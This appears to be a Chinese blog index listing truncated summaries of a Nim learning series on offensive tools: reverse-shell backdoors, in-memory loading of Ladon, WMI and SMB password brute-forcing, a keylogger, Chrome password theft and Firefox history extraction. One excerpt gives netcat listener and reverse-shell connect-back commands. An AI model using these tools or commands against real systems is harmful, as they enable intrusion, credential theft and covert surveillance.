摘要:
nim 嵌入C 代码(nim学习系列) 假设手头上有一份现成的 C 代码,比如 PersistentCReverseShell ,这是一个用 C 语言实现的 windows 反弹 shell 后门,请不要上传到 www.virustotal.com 进行扫描。如何快速利用这段代码呢,好在 nim 提 阅读全文
摘要:
内存加载 ladon.exe(nim学习系列) 测试环境 windows 7 x64 + .NET Framework 4.0 Ladon.exe version 7.0 内存加载 Ladon.exe 首先将 ladon.exe 转换成 bytes array,这里使用 nim 的 readByte 阅读全文
摘要:
nim 反弹 shell(nim学习系列) 反弹 netcat shell netcat 监听: nc -vv -l -p 80 nimNC 反弹shell: nimNC 172.20.10.4 80 源代码 nimNC.nim #[ Author: StudyCat Blog: https://w 阅读全文
摘要:
WMI密码批量爆破 先探测目标 IP 地址 135 端口是否开放,后进行密码的扫描。调用 swbemlocator 对象连接目标,然后根据响应信息,判断账密是否正确。除了输出扫描过程,发现的正确账号密码会保存到当前工作目录下的wmilogin.log 文件中。 用法 Usage: wmiLogin. 阅读全文
摘要:
键盘记录器(nim学习系列) 本系列随笔仅用于学习目的,不能保证代码的兼容性和健壮性。 最近学习 @byt3bl33d3r 的Github项目,简单修改 keylogger_bin.nim,将键盘记录信息经过AES加密并保存到文件。 截图 程序将键盘记录输出到控制台的同时,也保存到文件(临时目录下一 阅读全文
摘要:
读取 chrome 浏览器密码(nim学习系列) 全版本 chrome 浏览器支持 仅支持 windows 系统下使用 需要 sqlite3_32.dll或者sqlite3_64.dll 读取当前用户 chrome 浏览器密码 源代码 chromepwd.nim #[ Author: StudyCa 阅读全文
摘要:
SMB密码爆破(nim学习系列) 关键字:windows smb密码爆破;445端口;弱口令扫描; ntlmhash爆破; 使用方法 支持明文密码爆破 支持ntlmhash爆破 通过命令行或者文件导入目标IP地址 先扫描目标IP 445端口,如果开放再进行密码爆破 输出爆破过程,成功密码保持到 sm 阅读全文
摘要:
多线程子域名扫描(nim学习系列) 参考: https://github.com/rockcavera/nim-ndns 有趣的是,使用作者给出的例子,解析"www.baidu.com"及"nim-lang.org"的A记录居然返回空,很明显是不对的。 import ndns #默认使用 8.8.8 阅读全文
摘要:
调用 MessageBoxW 函数(nim学习系列) 不引用 winim 库调用 winapi 中的 MessageBoxW 函数。 源代码 popw.nim #[ Author: StudyCat Blog: https://www.cnblogs.com/studycat Github: htt 阅读全文
摘要:
读取firefox浏览器历史记录(nim学习系列) 读取firefox历史记录 读取firefox浏览器历史记录并保存到CSV文件(需要sqlite3_64.dll或者sqlite3_32.dll)。 编译: nim c -d:release --opt:size --cpu:amd64 firef 阅读全文